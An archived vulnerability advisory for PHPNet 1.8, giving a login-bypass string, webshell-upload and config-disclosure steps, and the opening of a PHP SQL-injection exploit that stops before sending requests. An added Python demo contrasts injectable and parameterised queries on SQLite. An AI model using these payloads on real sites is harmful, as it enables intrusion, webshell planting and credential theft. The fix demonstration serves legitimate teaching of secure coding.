PHPNet <= 1.8 (ler.php) SQL Injection and Fix - Vulnerability Warning - Black Bar Safety Net

2012-06-13T00:00:00
ID MYHACK58:62201234102
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-06-13T00:00:00

Description

<?php

/*

Title: PHPNet <= 1.8 (ler.php) SQL Injection

Author: WhiteCollarGroup

Developer: http://www.phpnet.com.br/

Download address: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos

Affected version: 1.8

Test platform: Debian GNU/Linux, Windows 7 Ultimate


In this system we discovered multiple SQL injections.

~> SQL Injection

This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.

ler.php?id=[SQLi]

imprimir.php?id=[SQLi]

imagem.php?id=[SQLi]

Example

php file.php http://www.xxx.com/path/

~> Login bypass

In the login page, you can bypass the login using the "SQLi strings".

Go to http://www.xxx.com/path/admin/login.php

Login: 'or 1=1-- wc

Pass: wcgroup

~> arbitrary file upload

After opening the administration panel, try to add a new article.

Use the upload form to upload your webshell.

After posting, access:

http://server/path/tmp/your_shell_filename.php

~> information disclosure

Access:

http://server/path/conf/config.ini

~> XSS Stored (persistent)

When posting a new article, you can put (D)HTML/JavaScript code on the page.

*/

function _printf($str) {
    echo $str."\n";
}

// Build a MySQL 0x.. hex literal for $string so it can be placed in the
// injection without any quote characters
function hex($string) {
    $hex = ""; // PHP 'Dim' =]
    for ($i = 0; $i < strlen($string); $i++) {
        // zero-padded; the original's bare dechex() would drop the leading 0 for bytes below 0x10
        $hex .= sprintf('%02x', ord($string[$i]));
    }
    return '0x'.$hex;
}

set_time_limit(0);
error_reporting(E_ERROR | E_USER_WARNING); // the original used '&', which evaluates to 0 and silences every error
@ini_set('default_socket_timeout', 30);

echo "\n";
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";

if ($argc != 2) {
    _printf("Usage:");
    _printf("php $argv[0] <target>");
    _printf("Example:");
    _printf("php $argv[0] http://www.xxx.com/path/");
    exit;
}

$target = $argv[1];
if (substr($target, (strlen($target)-1)) != "/") { // if the last character is not a slash
    $target .= "/";
}

// -0' closes the quoted id so that no real article is selected; %20 is the space before the rest of the injection
$inject = $target . "ler.php?id=-0'%20";

$token = uniqid();        // random marker used to locate the injected output in the response
$token_hex = hex($token); // as a 0x.. literal, so the payload needs no quotes

// now retrieve the following data: user() version()
echo "\n\n[*] Trying to get information...\n";

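The injection points the advisory describes (the quoted id parameter of ler.php and the admin login form), the ' or 1=1-- bypass, and the token-delimited UNION extraction that the script's $token / $token_hex prepare are modelled below against an in-memory SQLite database, beside the parameterised queries that close them. This is an added example, not WhiteCollarGroup's exploit and not PHPNet's code. Assumptions: the schema users(login, pass) and articles(id, title, body) is invented; SQLite stands in for MySQL, so sqlite_version() and || replace version() and CONCAT(); mysql_hex_literal() only reproduces what the script's hex() builds, since SQLite does not read 0x.. literals as strings.

```python
import re
import sqlite3

TOKEN = "4fd7e1c2a9b3"  # constructed marker; the exploit derives it from uniqid()


def fresh_db():
    """In-memory stand-in for PHPNet's database (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(login TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Hello', 'first post');
    """)
    return db


# --- vulnerable pattern: request parameters concatenated into the SQL text,
#     which is what admin/login.php and ler.php?id= do according to the advisory
def login_vulnerable(db, login, password):
    sql = "SELECT login FROM users WHERE login = '%s' AND pass = '%s'" % (login, password)
    return db.execute(sql).fetchone()


def article_vulnerable(db, id_param):
    sql = "SELECT title, body FROM articles WHERE id = '%s'" % id_param
    return db.execute(sql).fetchall()


# --- fixed pattern: bound parameters, so the input is never parsed as SQL
def login_fixed(db, login, password):
    sql = "SELECT login FROM users WHERE login = ? AND pass = ?"
    return db.execute(sql, (login, password)).fetchone()


def article_fixed(db, id_param):
    if not re.fullmatch(r"[0-9]+", id_param):  # id is numeric; reject anything else
        return []
    sql = "SELECT title, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(id_param),)).fetchall()


def mysql_hex_literal(s):
    """What the script's hex() builds: a 0x.. literal that MySQL reads as the
    string s, so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def union_payload():
    """-0' closes the quoted id and matches no row, so the UNION row is the only
    output; the token on both sides lets the value be found regardless of the
    surrounding HTML; the trailing '-- ' comments out the closing quote."""
    return "-0' UNION SELECT '%s' || sqlite_version() || '%s', 'x'-- " % (TOKEN, TOKEN)


def extract_version(db):
    """Send the UNION payload through the vulnerable page and pull the value out
    from between the two token markers, as the exploit does with its response."""
    rows = article_vulnerable(db, union_payload())
    page = "\n".join("%s\n%s" % (title, body) for title, body in rows)
    m = re.search(re.escape(TOKEN) + r"(.*?)" + re.escape(TOKEN), page, re.S)
    return m.group(1) if m else None


def db_version(db):
    """Ground truth to compare the extracted value against."""
    return db.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    print("bypass  :", login_vulnerable(db, "' or 1=1-- wc", "wcgroup"))
    print("fixed   :", login_fixed(db, "' or 1=1-- wc", "wcgroup"))
    print("version :", extract_version(db))
    print("hex     :", mysql_hex_literal(TOKEN))
```

The numeric allow-list in article_fixed is the check a patched ler.php/imprimir.php/imagem.php needs in addition to binding the parameter: an id that is not digits is simply not a valid request.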